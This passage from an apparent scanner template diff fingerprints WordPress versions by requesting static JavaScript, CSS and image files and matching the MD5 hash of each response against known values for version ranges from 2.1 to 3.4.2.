3.2.1 + dsl: + - "(\"1f8d37bc83dd53b154ae924c0cd040ec\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"bf615625d772465e039ff5391650ca0a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/admin-bar.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"10fee05fc3a9b14be7bf83b0f5669b48\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"266a1b0885cfe3ec9d60667e6a15da9b\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"ddf7d05d4beb316f0d4a80f23ffb3225\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/hoverIntent.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"73e23cc2a686c50a9f80746d5fde8eb5\" == md5(body))" + - type: dsl + name: 2.8 - 3.3.3 + dsl: + - "(\"d0d5fed467b2ac6c1b79e88ec7a8b514\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/handlers.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"5890cd4d95125931f0e0650601e2a647\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.3.3 + dsl: + - "(\"92b374ca4bf0f5dfde86ea01725b5d2c\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"7f80b44718dd1d025d401549b5a00685\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/builder.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"33e43995385a54d175516d8ede7d75b9\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"92cc9bddf6afcff5e641eeba9e3eacc0\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"f2abb2f2083b5d2a9e2ab1d821fc72bf\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"5cf5f6ccca0fa4c4c8a0428e9240b81a\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"6b737ecca99b73e70149195653627e4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/effects.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"0efe4a1f7374463232bc598926a7b4d4\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"29a97dc0bf45c93560b28421843b75c2\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"ab48b4f30f63f701e491ba9bb1b5451d\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"be6dba6cd4a57fc1dade9b547fc614d9\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"5723ef231fd913fa981a3dc5a2492131\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/scriptaculous.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"f333a7a32a2b7549853d606e50bee5d5\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"b4c44f312deb6cd7f76f8684276da04c\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"1bfeb4bd1d53b1951c25b51523471e1a\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"211d955609da0b228a65487384b95722\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"ba6e48c926618bb08b6a5853efeb2463\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/unittest.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"3ef5747adec5039f18816f2b2fb8cd6b\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"b41840d00193331f0fb68fc54f1085c6\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"3ae6f077da09244c08349e8920eee880\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"9ffcc3a22dbfeb9e5665247f376deb76\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"19e5e5117633a8bc41724d0bc67e4162\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/slider.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"7f9ed11dfea85c958a7fee63515ff930\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"e38b722aa3e5bf6f52c521d9fca0235f\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"8baa57d7d4382b95dcb953e7132d31c4\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"a35f869479bb76b2d0de3aaa808ead5e\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"e1169fc74b36a0c1529a15a85feda299\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/dragdrop.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"7b4c10c6a6783b1d60625ff4b0b34b3e\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"e07ef5d6af2980f8e72cd74e67690a54\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"f5fd2822d8577d30cb998566645f1fe6\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"f41cfdb65270e6f50eb1cce7cee52902\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"2a8ba7d2631729bb53b42530d522ff08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/MIT-LICENSE" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"4af5bdb483496e1c4db85a3fb03b5b6e\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"b72c811c3e4b902332903aacd47eef47\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"9f3d5ea8e5c0e7c721a40dc22ea20c72\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"644476df73032b063a33b199a3003fd8\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"b86a0a3506f37117d1540c359b1a7ed8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/wp-scriptaculous.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"360573487f5e7830b54f27af815a0a58\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"1b6a98a2e2b55d90a88524faea79f0a8\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"1bfeb4bd1d53b1951c25b51523471e1a\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"c0deff8348d644fe7727daa4415de64d\" == md5(body))" + - type: dsl + name: 2.1.1 - 2.1.3 + dsl: + - "(\"7a44c05d1d583369275dba694ff14a3f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/sound.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"69ffb734e10e8d1ef0e7a251ec0ca539\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"d654e517c3813d9a21280b6c2e58a8db\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"5a58260c9ccef7a67ae2e4f7d07f9ea9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/controls.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"8df54b04b3a05b5a5d68643cde67f77b\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"fcf61880c81c69a8c892020de19216e6\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"6e5f2d4fd9802a5cbc2e7ff7cf6674ec\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"3caf5091b68f3a6afaf881744509d4c6\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"23cef7404ffe6d410b0c235433771d51\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/prototype.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"965fe52b851d8ff3c2b915ada9fb273f\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"bab4179aef164e96e866b03ac432bdf7\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"3766aeff5778b54f74f93670322ca0df\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"ed2d6608b0832c5e990e10729157b485\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"e4d323d8dfe7260fe01cefe6143f094d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/autosave.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f62b83e650dce98e19b872eb43689298\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"af6a27d4947af4b7fdbfd0ed7c00d455\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9aea40acf0c39e1ed27ce59b0e38576b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"24373f9824e45b2c2e9e5c6286fe2f78\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"2b4fe432af9394459e60dbad48c11459\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"8ff33e244aaae79e1547003b03dffc3a\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"10cd5dfe482cfff61d7e628a81e61922\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-loader.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"96e5dedaddcfa2e0514f29bf1dd402c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/comment-reply.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"20ef5771571f1be483869066b2830c2f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wplink.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"dc327b2e93ae86b3be62a536379457e9\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"23e5ee4b8b9d543add71e8191cf3c90e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tw-sack.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"b989a5bd84f6ebcbc1393ec003e6e991\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-ajax-response.dev.js" + matchers: + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"54b536447cd644bcafa51a568be8c54e\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"ddc65b357dbc1b10b4a9eeb97a4bd704\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/quicktags.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"191ea92b9cdd1a23d48ad67fba256f0a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"2f4dbf99b6555cff7e2bceda7986b269\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1435292e5022e57170c6bd710fffb085\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"5a299970e59a4155990a34066e4bd41a\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"0ee241770ed514d28020ddedc9db2326\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/handlers.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"793ff9921f096583ba52f8606ec79f4c\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"95eb0e3071c8eb18628fcd952e4b6384\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"4c158d390795fa26ae94a33f62c02885\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"59ff0a965a09179e90282c94f4eb3098\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"6659d58b56b0aa9121f88dd048acee1c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.form.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"1210dad363fcd0a43dc28244b69369f9\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"e18e58c9f23c19a9b0233af61e1f5308\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"820f80306571dbe0a1deb0b63496d85f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.color.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"5291cf4f8f19bd8692befbebc2761440\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"ec1d98b35884ecc9de0e6f058fefe6b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.color.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"ec1d98b35884ecc9de0e6f058fefe6b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.hotkeys.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a7ad102b68229e728863325d0efec72e\" == md5(body))" + - type: dsl + name: 2.8 - 3.3.3 + dsl: + - "(\"dfdd8d2cc9be955dbb8dd14aae1daf40\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.fold.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f69b3b79f4bcf7469073043135cf6307\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"59cdbee6307a4fce031bbd89009a82e8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.core.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"6c97a90bce71c640c4a78753a4c589ec\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d5112dfa4dd8e8f8067081cbd8be3ae3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.highlight.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"42313e472b34be79275d6006b8530d33\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"34b4be2a83a8eebb16ac5297a7dcfde9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.explode.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8ac1dfce432d3647b3ff1ebe8031ce6f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d8ba624f5336b14a49f56ca304982cb7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.blind.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"10b40853994ade768b452861bb0896c4\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"1e2a8b2eed5b1b2f24e12adc436c2b44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.bounce.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"abd026273ad30b0122973bd085e4d9be\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"873b92422573849fad6cccb726c2e6bc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.transfer.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"577573b3f3586e9f239a82b4066993fd\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"3c127931b63007c90efff1e507947ff6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.clip.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"bdc3cf35b8dbf9c95533a7041b7997a7\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"35ba32293d3a1074e2b5d17407a1cb66\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.fade.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"573626f9df72877a8255b4b7cdbaa6d2\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"bba378cc8a154be8b3af270b42d7143b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.pulsate.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"cf94d2a6a7f254ae983a859b96b22e48\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"fc421b7d814dddec5b97de420b2674c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.scale.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"40ca173ecd15c47c39fc04864a4ad9f5\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a1f7d2ad92d7a574ba40a6ae3efa8e10\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.drop.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c78aae2ed48fe5c20e6f301d2121b506\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"e50bdec823723dac7508d2343559c598\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.shake.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0f7eda61dce38226f959fe4128118b94\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"560554c3e186ad5ec2ce909a858257b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.slide.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f4fdf642ec7e0cab73ce242ef9789025\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"709c80dab78bcb4ea4b2344b0174c4cf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/suggest.dev.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"4da8fd7204488b2d4541a426c1d351ce\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"24afc2920f7ace150877a5bcbd39f409\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.table-hotkeys.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"baa8747ae1cb2d15755733fa4f96f1b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-list-revisions.dev.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"10b8adab39fa790c52bac5c59cead9a8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.css" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"3888e9f93e218814c97a146069d104f1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.js" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"e363e3b8839e5db9fa0260eeabfac23e\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"ead9e5f733592ae8f9b227507de37ee6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"ed882314c841932770eab4413337b4b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/colorpicker.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"a513cd35728deb3db7dcb9b75da0a62d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-pointer.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9fb67c2257a8111e496014c2d2f3a930\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"42396561deb435781feb07f63e7c6039\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/ui.css" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"a2992e048f28ae11937e337d5d7c9be7\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"be18fcaa0cd42745ac9c405543a1336b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"0e570cb840d2c73dcd7df92be165f9e9\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"a464cac9829cb4b064c6e3f91fcccb7c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"924d870e2ef4a1e18fb47fe5bccf7111\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"dfe72f9deb99c91098ba3b1b11f63e50\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0a25f1ee5635ea5c98d12fe6a25124dd\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"367a7bc01297b49618ee3900b424d1d9\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"fda7ac60d42b36416c6f1590929cc2a7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"21df9dbdbe1be96d4e1822bf08513a04\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"ed402838f592c94f7193ea14f8b6080d\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"2a77fd1e668cca9cc75779f9a5f1e912\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/json2.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"74d903049683e5bbea9ccb7544a42bca\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"8b5970b79549b145296e6ec137eb5edb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-base.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"96113df5c6d74956eaa855233e4740b2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-arrow-frame.png" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"91eb07c759f3fcd0b8ec0d8d50004657\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-dark-rtl.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"b6f525c71c056ecedfd837daf18c3c4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/logo.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"a402ef261eb443496e6179f6e9653d29\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"31ab13232b3f67b49412db6f08f0ece7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/button-grad.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"16609cb9ee7897725e7692c17e9c29e4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-vs.png" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"8720fba5c7c55ff7becb4c1ee4bff05b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/ed-bg.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"58d491c508be7f09809f11bca4a1bd77\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/logo-ghost.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"c406a787e10714b99129ff7dff95efcd\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"bcf478ea9e8c426afefd159d7377ddee\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"5bc579022c0e93463d3bab42e8f236ed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/upload-fresh.png" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"aadb80b7f4e866a8568035b4dd32e55b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-dark-rtl-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"c5550106c0be4db9a6960d0e3de2e3ff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/widgets-arrow-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"712a381eb9ac71764ea4a79febdc7cc5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-bits-rtl-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"bfafda149631a7526d0d13c405898411\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"622bc5e4f63493c37b114406561c5de5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/upload-classic.png" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"7919cd151cfb4b0af5fd524f0e446635\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/toggle-arrow-rtl.gif" + matchers: + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"da61f45c1385ee6ed1663676eec4aed2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-bits-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"6427a352215dc555ad24e26db148136c\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"b1627ef5a5aad512136dcef1213763ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"35ec77238a48560932bf6165a6db7e6c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/gray-grad.png" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"c5fd1e0895b8dec4db822fa9a3f7b92d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screen-options-toggle.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"b170bba2b2871a230b24c74f4aae6357\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-bits-rtl.gif" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"7d173c47b0f3e0466298a2d6d32b039b\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"e432360b7566ff59bd6c7b4df564b713\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-arrow-frame-rtl.png" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"c9de2cf71ae15d6c01a8083dcd8e71e8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/ed-bg-vs.gif" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"470e06ad98e744340ad5e90b11e3dce6\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"01112dae05c7c37e16eeb3647c138a66\" == md5(body))" + - method: GET + path: + - 